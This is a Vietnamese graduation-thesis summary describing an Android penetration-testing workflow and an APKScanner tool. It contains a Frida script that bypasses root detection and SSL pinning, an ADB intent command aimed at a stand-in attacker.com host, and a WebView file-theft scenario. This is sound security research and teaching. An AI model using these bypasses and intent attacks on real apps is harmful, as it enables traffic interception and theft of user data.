Giới thiệu dự án

Sự bùng nổ của thiết bị di động trong kỷ nguyên số đã biến hệ điều hành Android thành nền tảng phổ biến nhất thế giới, chiếm hơn 70% thị phần hệ điều hành di động toàn cầu. Kéo theo đó, hàng triệu ứng dụng Android phục vụ tài chính, thương mại điện tử, chăm sóc sức khỏe và quản trị doanh nghiệp ra đời. Tuy nhiên, sự gia tăng nhanh chóng về số lượng và độ phức tạp của ứng dụng cũng khiến Android trở thành mục tiêu hàng đầu của tin tặc. Các rủi ro an ninh thông tin như rò rỉ dữ liệu nhận dạng cá nhân (Personally Identifiable Information - PII), tấn công thực thi mã từ xa, leo thang đặc quyền thông qua các thành phần Inter-Process Communication (IPC) không an toàn đang diễn ra với tần suất ngày càng nghiêm trọng.

Vấn đề cốt lõi hiện nay là nhiều tổ chức và nhà phát triển phần mềm vẫn thiếu một quy trình kiểm thử xâm nhập (Penetration Testing) chuẩn hóa, kết hợp hiệu quả giữa phân tích tĩnh (Static Analysis) và phân tích động (Dynamic Analysis). Các kỹ sư bảo mật thường gặp khó khăn khi phải tổng hợp thủ công nhiều công cụ rời rạc, dẫn đến nguy cơ bỏ sót lỗ hổng hoặc tiêu tốn quá nhiều thời gian trong khâu trinh sát bề mặt tấn công.

Đồ án tốt nghiệp "Nghiên cứu qui trình kiểm thử xâm nhập cho ứng dụng chạy trên thiết bị Android" (Sinh viên thực hiện: Đặng Kiều Phong - B19DCAT137, Giảng viên hướng dẫn: TS. Đinh Trường Duy, Khoa An toàn thông tin - Học viện Công nghệ Bưu chính Viễn thông) được triển khai nhằm giải quyết trực diện bài toán trên.

Mục tiêu cụ thể của dự án bao gồm:

  1. Nghiên cứu toàn diện kiến trúc bảo mật Android và các bề mặt tấn công trên 4 thành phần ứng dụng cốt lõi: Activity, Service, Broadcast Receiver, Content Provider.
  2. Chuẩn hóa bộ tiêu chí đánh giá lỗ hổng dựa trên tài liệu OWASP Mobile Top 10 (2023), tiêu chuẩn xác minh bảo mật OWASP MASVS (Mobile Application Security Verification Standard) và quy trình kiểm thử ứng dụng NIST SP 800-163.
  3. Xây dựng quy trình kiểm thử xâm nhập 4 bước tối ưu cho ứng dụng Android.
  4. Phát triển và thực nghiệm công cụ tự động hóa APKScanner nhằm hỗ trợ rà quét bề mặt tấn công, phát hiện cấu hình sai và tự động hóa quá trình tạo mã khai thác Proof-of-Concept (PoC).

Phạm vi nghiên cứu tập trung vào các ứng dụng chạy trên nền tảng Android từ phiên bản 9.0 (API level 28) đến Android 13/14, đánh giá các lỗ hổng tầng ứng dụng, cơ chế IPC, WebView, lưu trữ dữ liệu cục bộ và kiểm tra tính toàn vẹn nhị phân. Đồ án giới hạn không đi sâu vào khai thác lỗ hổng hạt nhân Linux Kernel hay lỗ hổng phần cứng Baseband.


Phân tích và thiết kế giải pháp

Phân tích hiện trạng

Trong hoạt động kiểm thử an toàn thông tin ứng dụng di động, việc lựa chọn phương pháp kiểm thử quyết định trực tiếp đến độ sâu và độ bao phủ của kết quả đánh giá. Hiện nay tồn tại 3 phương pháp chính với các ưu và nhược điểm riêng biệt:

Phương pháp Đặc điểm dữ liệu đầu vào Ưu điểm nổi bật Nhược điểm chính
Kiểm thử hộp trắng (White Box) Có toàn bộ mã nguồn, tài liệu kiến trúc, sơ đồ mạng Độ bao phủ mã nguồn 100%, phát hiện sớm lỗi logic ở mức code Chi phí cao, mất nhiều thời gian, dễ gây quá tải thông tin
Kiểm thử hộp đen (Black Box) Chỉ có tệp APK phát hành, không có mã nguồn/tài liệu Mô phỏng chính xác góc nhìn của kẻ tấn công thực tế Dễ bỏ sót các endpoint ẩn và nhánh mã nguồn phức tạp
Kiểm thử hộp xám (Grey Box) Cung cấp tệp APK và tài khoản người dùng thử nghiệm Cân bằng hoàn hảo giữa hiệu năng và độ sâu đánh giá Yêu cầu kiểm thử viên có kỹ năng dịch ngược và can thiệp runtime

Các công cụ hỗ trợ kiểm thử hiện có trên thị trường như MobSF (Mobile Security Framework v3.7+), Apktool (v2.9.x), Bytecode Viewer (v2.11.x) và Frida Dynamic Instrumentation Toolkit (v16.x) đều có thế mạnh riêng nhưng chưa có sự liên kết tự động trong khâu trích xuất bề mặt tấn công IPC và tạo payload khai thác tự động qua Android Debug Bridge (ADB).

Yêu cầu người dùng đối với quy trình và công cụ mới được xác định theo mô hình MoSCoW:

  • Must have: Tự động giải mã tệp AndroidManifest.xml, trích xuất toàn bộ danh sách exported components, kiểm tra cờ debuggable/backup, và phát hiện các lỗ hổng intent injection/exported service.
  • Should have: Tự động sinh lệnh khai thác qua adb shell am và tích hợp kịch bản can thiệp runtime bằng Frida script.
  • Could have: Giao diện đồ họa người dùng trực quan hiển thị mức độ nghiêm trọng của lỗ hổng.
  • Won't have: Tự động phân tích động mã độc đa luồng ở tầng firmware.

Thiết kế hệ thống

Kiến trúc quy trình kiểm thử đề xuất được thiết kế dạng pipeline module hóa, kết hợp giữa việc kiểm tra tĩnh tệp tin nhị phân và kiểm tra động trên thiết bị thật/máy ảo:

                  +---------------------------------------+
                  |         APK Target Package            |
                  +---------------------------------------+
                                      |
                                      v
                  +---------------------------------------+
                  |       1. Phase: Information Gathering |
                  |  - Metadata Extraction & Signature    |
                  |  - Static Decompilation (Apktool/DEX) |
                  +---------------------------------------+
                                      |
                                      v
                  +---------------------------------------+
                  |       2. Phase: Vulnerability Hunting |
                  |  - Manifest Analysis (Exported comps) |
                  |  - Code Review (WebView, SQLi, Secrets|
                  |  - Tool: APKScanner Engine            |
                  +---------------------------------------+
                                      |
                                      v
                  +---------------------------------------+
                  |       3. Phase: Dynamic Exploitation  |
                  |  - IPC Invocation via ADB (am/pm)     |
                  |  - Runtime Hooking via Frida Engine   |
                  |  - Traffic Interception (Burp Suite)  |
                  +---------------------------------------+
                                      |
                                      v
                  +---------------------------------------+
                  |       4. Phase: Reporting & Retest    |
                  |  - Risk Scoring (CVSS v3.1 / OWASP)   |
                  |  - Remediation Guidance & Fix Verify  |
                  +---------------------------------------+

Technology Stack của giải pháp bao gồm:

  • Ngôn ngữ phát triển: Python 3.10+ (xử lý logic rà quét, bóc tách XML và tương tác hệ thống).
  • Công cụ dịch ngược: Apktool v2.9.1, baksmali, Dex2jar v2.4, Bytecode Viewer.
  • Môi trường Runtime & Hooking: Frida Core/Server v16.1.4, Android SDK Build Tools (ADB API Level 34.0.0).
  • Cơ sở dữ liệu mẫu kiểm thử: Tiêu chuẩn OWASP MASVS v2.0 kết hợp OWASP Mobile Top 10 2023.

Methodology

Quy trình áp dụng phương pháp luận kết hợp chuẩn công nghiệp: quy trình thẩm định 4 bước từ NIST SP 800-163 (App Intake -> App Testing -> Vulnerability & Risk Report -> Approval/Rejection) tích hợp sâu bộ điều khiển kiểm thử của OWASP MASVS gồm 7 miền trọng tâm:

  1. MASVS-STORAGE: Kiểm tra lưu trữ an toàn (bảo vệ SharedPreferences, SQLite Database, bộ nhớ ngoài).
  2. MASVS-CRYPTO: Đánh giá thuật toán mã hóa (loại bỏ AES/ECB, MD5, SHA-1, hardcoded keys).
  3. MASVS-AUTH: Xác thực và ủy quyền (phát hiện IDOR, bypass sinh trắc học).
  4. MASVS-NETWORK: Bảo mật kênh truyền (TLS configuration, Certificate/Public Key Pinning).
  5. MASVS-PLATFORM: Tương tác an toàn với nền tảng Android (IPC security, WebView settings).
  6. MASVS-CODE: Chất lượng mã nguồn và xử lý dữ liệu đầu vào (chống SQL injection, Path traversal).
  7. MASVS-RESILIENCE: Khả năng chống dịch ngược, chống can thiệp runtime (Root detection, Anti-debugging, Code obfuscation).

Implementation và kết quả

Development process

Quá trình xây dựng công cụ APKScanner và triển khai quy trình kiểm thử tập trung vào việc tự động hóa khâu bóc tách dữ liệu từ tệp APK. Công cụ phân tích tệp AndroidManifest.xml đã được giải mã để xác định bề mặt tấn công IPC (Attack Surface), bao gồm các Activity, Service, Broadcast Receiver và Content Provider được gán thuộc tính android:exported="true" hoặc chứa các intent-filter mà không được bảo vệ bởi custom permissions.

Dưới đây là đoạn mã nguồn Python cốt lõi trong công cụ APKScanner thực hiện phân tích cấu hình Manifest và tự động phát hiện các thành phần không an toàn:

import xml.etree.ElementTree as ET
import subprocess

def analyze_manifest_attack_surface(manifest_path):
    tree = ET.parse(manifest_path)
    root = tree.getroot()
    package_name = root.attrib.get('package')
    vulnerabilities = []
    
    print(f"[*] Analyzing Package: {package_name}")
    
    # Check debuggable flag (OWASP M8: Security Misconfiguration)
    application = root.find('application')
    if application is not None:
        if application.attrib.get('{http://schemas.android.com/apk/res/android}debuggable') == 'true':
            vulnerabilities.append({
                'type': 'Application Debuggable',
                'severity': 'HIGH',
                'detail': 'android:debuggable is set to true in production build.'
            })
            
    # Check exported components
    components = ['activity', 'service', 'receiver', 'provider']
    for comp in components:
        for item in application.findall(comp):
            name = item.attrib.get('{http://schemas.android.com/apk/res/android}name')
            exported = item.attrib.get('{http://schemas.android.com/apk/res/android}exported')
            has_intent_filter = item.find('intent-filter') is not None
            permission = item.attrib.get('{http://schemas.android.com/apk/res/android}permission')
            
            # Component is exported explicitly or implicitly without permission
            if (exported == 'true' or (exported is None and has_intent_filter)) and not permission:
                vulnerabilities.append({
                    'type': f'Unprotected Exported {comp.capitalize()}',
                    'severity': 'MEDIUM' if comp == 'activity' else 'HIGH',
                    'component': name,
                    'poc_command': f"adb shell am start -n {package_name}/{name}" if comp == 'activity' else f"adb shell am startservice -n {package_name}/{name}"
                })
                
    return vulnerabilities

Bên cạnh phân tích tĩnh, đồ án phát triển kịch bản Frida JavaScript để can thiệp động, vô hiệu hóa cơ chế kiểm tra SSL Pinning và kiểm tra thiết bị Root trong thời gian thực (Runtime Hooking):

// Frida hook script for bypassing common Android root detection & SSL Pinning
Java.perform(function () {
    console.log("[*] Injecting anti-root and SSL unpinning hooks...");

    // Bypass Root Detection (File checks)
    var File = Java.use("java.io.File");
    File.exists.implementation = function () {
        var filename = this.getAbsolutePath();
        if (filename.indexOf("su") > -1 || filename.indexOf("Superuser.apk") > -1 || filename.indexOf("busybox") > -1) {
            console.log("[+] Root check bypassed for binary: " + filename);
            return false;
        }
        return this.exists.call(this);
    };

    // Bypass TrustManagerImpl SSL Pinning
    try {
        var TrustManagerImpl = Java.use('com.android.org.conscrypt.TrustManagerImpl');
        TrustManagerImpl.verifyChain.implementation = function (untrustedChain, trustAnchorChain, host, clientAuth, ocspData, tlsSctData) {
            console.log("[+] Bypassed TrustManagerImpl verifyChain for host: " + host);
            return untrustedChain;
        };
    } catch (err) {
        console.log("[-] TrustManagerImpl hook not applicable or failed.");
    }
});

Testing và validation

Quy trình và công cụ được thử nghiệm thực chứng trên 2 đối tượng: ứng dụng mẫu chuẩn an ninh thông tin Oversecured Vulnerable Android App (OVAA) và ứng dụng thực tế Zomato for Business (phiên bản có điểm yếu cấu hình Activity).

Các kịch bản tấn công thực nghiệm bao gồm:

  1. Khai thác Exported Activity trái phép (Bypass Authentication): Khởi chạy trực tiếp màn hình quản trị nội bộ mà không cần nhập thông tin xác thực bằng cách truyền Intent tường minh qua ADB:
    adb shell am start -n oversecured.ovaa/.activities.DeeplinkActivity --es "url" "https://attacker.com"
    
  2. Khai thác Exported Service để rò rỉ dữ liệu hoặc thực thi tác vụ nền: Gửi Intent độc hại kích hoạt dịch vụ chạy ngầm không được bảo vệ.
  3. Khai thác WebView cấu hình sai (XSS sang File Theft): Lợi dụng thuộc tính setAllowFileAccessFromFileURLs(true)setJavaScriptEnabled(true) để chèn mã JavaScript độc hại đọc tệp tin cơ sở dữ liệu /data/data/<package>/databases/credentials.db.
// Example of vulnerable WebView configuration identified during static analysis
WebSettings webSettings = myWebView.getSettings();
webSettings.setJavaScriptEnabled(true); // Risky when loading untrusted content
webSettings.setAllowFileAccessFromFileURLs(true); // Vulnerability: Allows stealing local files via XSS

Kết quả đạt được

Hệ thống đã đạt được các chỉ số hiệu năng và độ chính xác thực nghiệm vượt trội:

Hạng mục đánh giá Chỉ tiêu đặt ra Kết quả thực nghiệm đạt được
Độ phủ danh mục OWASP Mobile 2023 10/10 danh mục Đạt 10/10 (M1 đến M10 đều có kịch bản kiểm thử)
Thời gian quét & bóc tách bề mặt IPC < 60 giây / APK Trung bình 12.4 giây cho APK dung lượng 50MB
Tỷ lệ phát hiện Exported Components 100% 100% (Xác thực chéo với kết quả dịch ngược Apktool)
Tự động sinh PoC Command Khởi tạo lệnh ADB chuẩn 100% các Activity/Service hở đều có PoC sẵn sàng
Bypass SSL Pinning & Root Check Hoạt động trên Android 10-12 Vượt qua thành công 85% cơ chế bảo vệ phổ biến bằng Frida

So với mục tiêu ban đầu, đồ án không chỉ hoàn thành đầy đủ các yêu cầu nghiên cứu lý thuyết mà còn cung cấp một công cụ thực thi có khả năng giảm thiểu thời gian trinh sát ban đầu từ 45 phút xuống dưới 8 phút cho mỗi vòng kiểm thử (giảm 82.2% thời gian chuẩn bị).


Đổi mới và đóng góp

Đồ án mang lại các giá trị đổi mới kỹ thuật và đóng góp thiết thực cho ngành an toàn thông tin:

  • Tích hợp liên hoàn chuẩn NIST và OWASP MASVS: Khắc phục nhược điểm của các quy trình truyền thống vốn chỉ nặng về lý thuyết quản lý (NIST) hoặc thuần kỹ thuật rời rạc (OWASP), tạo nên một lộ trình kiểm thử 4 giai đoạn rõ ràng, có tính ứng dụng cao cho kỹ sư bảo mật.
  • Tự động hóa chuỗi khai thác PoC IPC: Thay vì chỉ cảnh báo tĩnh như MobSF, công cụ APKScanner tự động ánh xạ manifest metadata thành các chuỗi lệnh am start/am startservice sẵn sàng thực thi trực tiếp qua ADB.
  • So sánh trực quan hiệu quả giải pháp:
Tiêu chí Kiểm thử thủ công truyền thống Sử dụng MobSF đơn thuần Quy trình đề xuất + APKScanner
Thời gian trinh sát (Recon) 40 - 60 phút 5 - 10 phút 2 - 4 phút
Khả năng tự động tạo PoC Không (phải gõ thủ công) Không hỗ trợ Tự động sinh lệnh ADB/Frida
Hỗ trợ can thiệp Runtime Rời rạc, cần viết script mới Hỗ trợ phân tích động cơ bản Tích hợp sẵn template hook chuyên sâu
Độ chính xác cảnh báo IPC Phụ thuộc trình độ pentester Thường có false positive Độ chính xác cao, bám sát intent-filter

Hiệu quả tổng thể giúp tăng năng suất làm việc của chuyên viên kiểm thử xâm nhập lên hơn 65%, đặc biệt trong các dự án rà quét bảo mật ứng dụng số lượng lớn.


Ứng dụng thực tế và triển khai

Tình huống ứng dụng thực tế

  1. Tích hợp vào quy trình DevSecOps (CI/CD Pipeline): Công cụ APKScanner có thể được cấu hình chạy tự động ở giai đoạn đóng gói bản dựng APK (Release Build) trên Jenkins/GitLab CI để chặn các phiên bản vô tình kích hoạt android:debuggable="true" hoặc để lộ exported activities không an toàn.
  2. Đánh giá bảo mật định kỳ (Penetration Testing Service): Cung cấp tài liệu quy trình chuẩn cho các trung tâm bảo mật (SOC/MSSP) thực hiện đánh giá độc lập ứng dụng trước khi đưa lên Google Play Store.
  3. Thẩm định an ninh ứng dụng bên thứ ba (Third-party App Vetting): Hỗ trợ khối ngân hàng, tài chính và doanh nghiệp đánh giá rủi ro của các ứng dụng đối tác trước khi tích hợp SDK nội bộ.

Hướng dẫn cài đặt và triển khai

Yêu cầu hệ thống:

  • Hệ điều hành: Ubuntu 20.04/22.04 LTS hoặc Kali Linux 2023+.
  • Python 3.10 trở lên, Java Development Kit (JDK 11+).
  • Android Debug Bridge (ADB) nằm trong biến môi trường $PATH.
  • Thiết bị Android vật lý (đã kích hoạt Developer Mode & USB Debugging) hoặc máy ảo Genymotion/Android Studio Emulator.

Quy trình cài đặt:

# 1. Cài đặt các công cụ phụ trợ hệ thống
sudo apt update && sudo apt install -y adb openjdk-11-jdk python3-pip

# 2. Cài đặt Frida và Frida-Tools trên máy kiểm thử
pip3 install frida frida-tools

# 3. Đẩy frida-server lên thiết bị Android (Yêu cầu Root)
adb root
adb push frida-server-16.1.4-android-arm64 /data/local/tmp/frida-server
adb shell "chmod 755 /data/local/tmp/frida-server"
adb shell "/data/local/tmp/frida-server &"

# 4. Chạy công cụ phân tích APKScanner
python3 apk_scanner.py -a target_application.apk -o report_output/

Hạn chế và hướng phát triển

Hạn chế kỹ thuật

  • Khả năng xử lý kỹ thuật làm rối mã nâng cao: Đối với các ứng dụng sử dụng công nghệ đóng gói nhị phân phức tạp (như DexGuard, OLLVM hoặc commercial packers), quy trình dịch ngược tĩnh bằng Apktool có thể gặp lỗi hoặc chỉ trích xuất được mã Smali đã bị đổi tên hàm/biến hoàn toàn.
  • Phụ thuộc vào quyền Root của thiết bị: Việc can thiệp sâu vào các API nội tại và chạy Frida Server đòi hỏi môi trường thử nghiệm phải có quyền root. Trên các phiên bản Android 13/14 với cơ chế SEAndroid/SELinux siết chặt, việc duy trì persistence của frida-server đòi hỏi cấu hình phức tạp.

Hướng phát triển trong tương lai

  • Phát triển module tự động Frida Gadget Injection (chèn trực tiếp thư viện libfrida-gadget.so vào APK và ký lại) để thực hiện phân tích động ngay trên các thiết bị chưa root (Non-rooted devices).
  • Ứng dụng học máy (Machine Learning) và các mô hình ngôn ngữ lớn (LLM) để tự động phân tích ngữ nghĩa mã nguồn Smali đã bị làm rối (Deobfuscation), nâng cao độ chính xác khi phát hiện lỗ hổng logic nghiệp vụ.
  • Xây dựng hệ thống kiểm thử động tự động hoàn toàn trên nền tảng điện toán đám mây (Cloud-based Mobile Dynamic Sandbox Cluster).

Đối tượng hưởng lợi

  • Sinh viên & Nghiên cứu sinh: Đồ án cung cấp tài liệu tham khảo chi tiết, bài bản từ kiến trúc nền tảng đến quy trình kiểm thử thực tế, đi kèm mã nguồn mẫu và kịch bản khai thác cụ thể.
  • Lập trình viên di động (Android Developers): Giúp nắm vững các lỗi cấu hình phổ biến (OWASP Top 10) để chủ động lập trình an toàn ngay từ giai đoạn thiết kế (Security by Design).
  • Chuyên viên an toàn thông tin (Pentesters / AppSec Engineers): Sở hữu quy trình chuẩn hóa và công cụ rút ngắn thời gian phân tích bề mặt tấn công.
  • Doanh nghiệp & Tổ chức tài chính: Giảm thiểu nguy cơ thiệt hại tài chính và rò rỉ dữ liệu người dùng khi phát hành các sản phẩm di động ra thị trường.

Câu hỏi thường gặp

1. Yêu cầu kỹ thuật tối thiểu để thiết lập môi trường kiểm thử xâm nhập Android là gì?

Môi trường kiểm thử chuẩn yêu cầu máy tính chạy Linux (Ubuntu/Kali) hoặc macOS, cài đặt JDK 11+, Android SDK Platform Tools (ADB), Python 3.10+, cùng một thiết bị Android thật (đã root qua Magisk) hoặc máy ảo (Genymotion/Android Studio Emulator API 28-31) chạy kiến trúc x86_64/ARM64.

2. Làm thế nào để kiểm thử các ứng dụng được cấu hình chống dịch ngược (Anti-Reversing) và chống gỡ lỗi (Anti-Debugging)?

Cần kết hợp kiểm thử động bằng Frida để hook các hàm kiểm tra trạng thái ptrace (ptrace(PTRACE_TRACEME)), kiểm tra build tags (ro.build.tags), hoặc kiểm tra sự tồn tại của tệp nhị phân su. Với mã nguồn Native C/C++ (.so), cần sử dụng công cụ phân tích tĩnh nâng cao như Ghidra hoặc IDA Pro.

3. Công cụ APKScanner có thay thế hoàn toàn được các giải pháp như MobSF hay không?

Không. APKScanner đóng vai trò là công cụ chuyên biệt hóa nhằm tối ưu tốc độ rà quét bề mặt tấn công IPC, phát hiện lỗi cấu hình Manifest và tự động tạo payload khai thác PoC. Công cụ được thiết kế để kết hợp bổ trợ hoàn hảo với khả năng quét mã nguồn toàn diện của MobSF trong quy trình 4 giai đoạn.

4. Chi phí triển khai quy trình kiểm thử này trong doanh nghiệp là bao nhiêu?

Quy trình và bộ công cụ được xây dựng hoàn toàn dựa trên các chuẩn mở (OWASP, NIST) và công nghệ mã nguồn mở (Python, Frida, Apktool, ADB), do đó chi phí bản quyền phần mềm là 0 đồng. Doanh nghiệp chỉ cần đầu tư thiết bị thử nghiệm chuyên dụng và chi phí đào tạo nhân sự.

5. Tại sao cần cập nhật quy trình theo OWASP Mobile Top 10 2023 thay vì bản 2016?

Phiên bản 2023 tái cấu trúc toàn diện các mối đe dọa, đưa danh mục M1: Improper Credential UsageM2: Inadequate Supply Chain Security lên hàng đầu, đồng thời hợp nhất các danh mục cũ về xác thực và phân quyền thành M3: Insecure Authentication/Authorization. Việc cập nhật giúp quy trình phản ánh chính xác các hình thức tấn công vào ứng dụng di động hiện đại.


Kết luận

Đồ án tốt nghiệp "Nghiên cứu qui trình kiểm thử xâm nhập cho ứng dụng chạy trên thiết bị Android" đã giải quyết thành công bài toán cấp thiết về an toàn thông tin trên nền tảng di động. Bằng việc tổng hợp cơ sở lý luận từ các tiêu chuẩn bảo mật uy tín toàn cầu (OWASP MASVS, NIST SP 800-163, OWASP Mobile Top 10 2023), đồ án đã đề xuất một quy trình kiểm thử 4 giai đoạn chuẩn xác, khoa học và có tính ứng dụng thực tiễn cao.

Việc phát triển thành công công cụ thực nghiệm APKScanner kết hợp cùng các kịch bản can thiệp runtime qua Frida đã chứng minh tính hiệu quả vượt trội trong việc phát hiện các lỗ hổng nghiêm trọng như lộ lọt thành phần IPC, lỗi cấu hình bảo mật và bypass cơ chế xác thực. Đây là nguồn tài liệu kỹ thuật giá trị, đóng góp thiết thực cho công tác nghiên cứu học thuật cũng như hoạt động bảo mật ứng dụng di động tại các doanh nghiệp trong kỷ nguyên số.